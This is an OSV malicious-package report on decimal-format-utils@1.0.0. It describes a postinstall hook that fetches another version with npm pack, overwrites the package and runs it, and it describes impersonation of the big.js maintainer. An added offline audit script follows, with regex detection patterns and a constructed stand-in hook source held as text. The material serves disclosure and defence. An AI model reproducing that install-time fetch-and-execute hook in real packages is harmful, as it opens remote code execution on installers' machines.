decimal-format-utils@1.0.0

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6368

Ecosystem

npm

Summary

The postinstall script scripts/sync-peer.cjs runs npm pack decimal-format-utils@1.0.1 (or whichever version is configured via the BACKUP_TARGET_VERSION/BACKUP_PAYLOAD_SPEC environment variables), extracts the resulting tarball, overwrites every file of the installed v1.0.0 package in place via fs.cpSync over the package root, and then require()s the replaced index.js and awaits from_str(). The effect is that npm install decimal-format-utils@1.0.0 executes code from a different, publisher-mutable version at install time: the lockfile pins only the 1.0.0 tarball, and whatever npm pack fetches during the install hook is outside the lockfile's control. This bypasses lockfile pinning and gives the publisher a live remote code execution channel into every install.

The package additionally impersonates the big.js maintainer: package.json sets author to Michael Mclaughlin and repository.url to https://github.com/MikeMcl/big.js.git, and the README falsely claims the package is pulled in automatically as a dependency of big.js@6.2.x. big.js declares no such dependency. The impersonation appears designed to lure installers into trusting an unrelated publisher whose postinstall then executes arbitrary fetched code.

Source: amazon-inspector (864677541e3090100ca588a37d8eb525f74817ade2fce5cb3e265af45b0c4e9a)
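Added example, not part of the OSV record or of the decimal-format-utils package: an offline heuristic audit in Node.js that flags the two behaviours the summary describes, an install-lifecycle hook that fetches another package and overwrites its own files, and a manifest whose repository points at an unrelated project. The manifest and the hook source below are constructed stand-ins modelled on the summary (the BACKUP_PAYLOAD_SPEC name comes from the summary; the pattern ids, function names and the benign comparison package are illustrative). Nothing is fetched or executed; the audit only reads text.

```javascript
// Added example: offline heuristic audit for the behaviour described in the
// summary above. Not code from the OSV record or from decimal-format-utils.
// Manifests and script sources are constructed stand-ins; pattern ids and
// function names are illustrative.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Things an ordinary library's install hook has no reason to do.
const SUSPICIOUS_SCRIPT_PATTERNS = [
  // Invoking the package manager from inside an install hook (e.g. `npm pack <spec>`).
  { id: "fetches-other-package", re: /\bnpm\s+(?:pack|install|i)\b/ },
  // Bulk copying/overwriting files at install time (e.g. fs.cpSync over the package root).
  { id: "overwrites-files", re: /\bfs\.(?:cpSync|cp|copyFileSync|writeFileSync)\s*\(/ },
  // Target version/spec chosen by an environment variable at install time.
  { id: "env-controlled-target", re: /process\.env\.[A-Z0-9_]*(?:VERSION|SPEC|PAYLOAD)[A-Z0-9_]*/ },
  // Loading the package's own entry point from the hook (runs whatever was just copied in).
  { id: "executes-own-entry", re: /\brequire\s*\(\s*['"][^'"]*index(?:\.c?js)?['"]\s*\)/ },
];

// "node scripts/sync-peer.cjs" -> "scripts/sync-peer.cjs"; any other command -> null.
function hookScriptFile(command) {
  const m = /^\s*node\s+(\S+)/.exec(command);
  return m ? m[1] : null;
}

// Last path segment of repository.url without ".git", lower-cased; null if absent.
function repoBasename(repository) {
  const url = typeof repository === "string" ? repository : repository && repository.url;
  if (!url) return null;
  const m = /([^/:]+?)(?:\.git)?\/?$/.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// pkg: parsed package.json; scriptFiles: { "<path in tarball>": "<source text>" }.
// Returns an array of findings; an empty array means nothing looked off.
function auditPackage(pkg, scriptFiles) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    findings.push({ check: "has-lifecycle-hook", hook, detail: command });
    const file = hookScriptFile(command);
    const source = file ? scriptFiles[file] : undefined;
    if (!source) continue;
    for (const { id, re } of SUSPICIOUS_SCRIPT_PATTERNS) {
      const m = re.exec(source);
      if (m) findings.push({ check: id, hook, detail: `${file}: ${m[0]}` });
    }
  }
  // Manifest pointing at a repository whose name does not match the package name.
  const repo = repoBasename(pkg.repository);
  const name = String(pkg.name || "").replace(/^@[^/]+\//, "").toLowerCase();
  if (repo && name && repo !== name) {
    findings.push({ check: "repository-name-mismatch", detail: `${pkg.name} -> ${repo}` });
  }
  return findings;
}

// Constructed manifest modelled on the summary (not the real package.json).
const SAMPLE_MANIFEST = {
  name: "decimal-format-utils",
  version: "1.0.0",
  author: "Michael Mclaughlin",
  repository: { type: "git", url: "https://github.com/MikeMcl/big.js.git" },
  scripts: { postinstall: "node scripts/sync-peer.cjs" },
};

// Constructed stand-in for the install hook, written to match the summary's
// description. It is plain text here and is never executed.
const SAMPLE_SCRIPT_FILES = {
  "scripts/sync-peer.cjs": [
    'const { execSync } = require("node:child_process");',
    'const fs = require("node:fs");',
    'const spec = process.env.BACKUP_PAYLOAD_SPEC || "decimal-format-utils@1.0.1";',
    'execSync("npm pack " + spec);',
    'fs.cpSync("package", __dirname + "/..", { recursive: true });',
    'require("../index.js").from_str();',
  ].join("\n"),
};

// Constructed benign manifest for comparison: no hooks, repository matches the name.
const BENIGN_MANIFEST = {
  name: "@example/widget",
  version: "2.0.0",
  repository: "https://github.com/example/widget",
};

console.log(JSON.stringify(auditPackage(SAMPLE_MANIFEST, SAMPLE_SCRIPT_FILES), null, 2));
console.log(auditPackage(BENIGN_MANIFEST, {}));
```

To run this against a real tarball, extract it with tar (which executes nothing), parse package.json, and pass in the files its lifecycle hooks reference. npm install --ignore-scripts skips lifecycle hooks entirely and is the simplest way to keep a hook like this from running. The regexes are a heuristic for this particular pattern, not a general malware detector; a hook that hides its commands behind string concatenation or eval will not match them.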
